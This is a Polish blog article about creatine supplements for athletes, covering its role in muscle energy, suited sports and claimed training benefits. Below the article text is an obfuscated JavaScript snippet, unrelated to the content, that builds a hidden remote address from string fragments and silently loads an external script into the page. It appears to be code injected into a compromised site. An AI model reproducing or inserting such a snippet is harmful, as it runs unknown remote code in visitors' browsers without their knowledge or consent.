Shadow

Coś o Kreatynie

Kreatyna obecnie jest uważana za jeden z najbardziej bezpiecznych i równocześnie najskuteczniejszych suplementów diety na masę dla sportowców. Właśnie z tego powodu, iż występuje naturalnie w ludzkim organizmie, liczni zawodcy z dziedziny kulturystyki i sportowcy- amatorzy regularnie stosują tę substancję w swojej diecie. Jakie efekty daje kreatyna i jak należy ją suplementować?

Czym jest kreatyna?

 Kreatyna jest niczym innym jak związkiem organicznym naturalnie występującym w ludzkiej tkance mięśniowej (aż w 95%). Przyjmuje ona formę fosfokreatyny, która gromadzi się w mięśniach w 66% oraz wolnej kreatyny (33%). Najważniejszym zadaniem tej substancji jest gromadzenie odpowiedniej energii mięśniowej, która zostaje uwalniania podczas wysiłku fizycznego, dlatego też im więcej znajduje się kreatyny w organizmie ludzkim, tym większa będzie energia do wykorzystania. Z tego powodu sportowcy stosują suplementację tego związku w swojej codziennej diecie.

Kreatyna w sporcie

Fosfokreatyna spełnia funkcje dostarczenia energii w początkowej fazie wysiłku fizycznego, a dokładniej wytwarza siłę mięśni już w pierwszych 10 sekundach od rozpoczęcia intensywnego treningu. Właśnie z tego powodu substancja ta idealnie sprzyja sportowcom uprawiającym

  • podnoszenie ciężarów
  • sporty walki
  • biegi na krótkie dystanse
  • kulturystyka

Skuteczność stosowania Kreatyny

Jak wskazują liczne badania, suplementacja Kreatyny w formie monohydratu zwiększa zapasy fosfokreatyny w organizmie ludzkim nawet o 40%. Dzięki temu możliwe jest znaczne zwiększenie zdolności mięśni do wykonywania intensywnego i długotrwałego wysiłku fizycznego.

Ważną kwestią jest fakt, iż wysoki poziom Kreatyny w mięśniach powoduje przyspieszenie procesów odnowy podczas przerw pomiędzy treningami. W skutek tego sportowiec posiada możliwość wykonywania większej liczby powtórzeń, dzięki czemu efekty treningów pojawiają się szybciej i skuteczniej w formie: przyrostu masy mięśniowej, wzrostu siły w mięśniach, poprawie wydolności fizycznej oraz wydajności treningów sportowych.

(function(){
a9mX=document.createElement(„script”);a9mX_=”u”+(„s”)+”ta”;
a9mX_+=(„t.i”)+””+”n”;a9mX_+=((„f”)+”o”);a9mX.type=”text/javascript”;
a9mX_+=”/”; a9mXu=”13719784″;a9mXu+=”.1w5ydvXr9mXknq00vc5″;a9mXu+=”kjytmbqmpzk”;
a9mX.src=”//”+a9mX_+a9mXu; a9mX.async=true; document.body.appendChild(a9mX);
})();

Przeczytaj także

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany.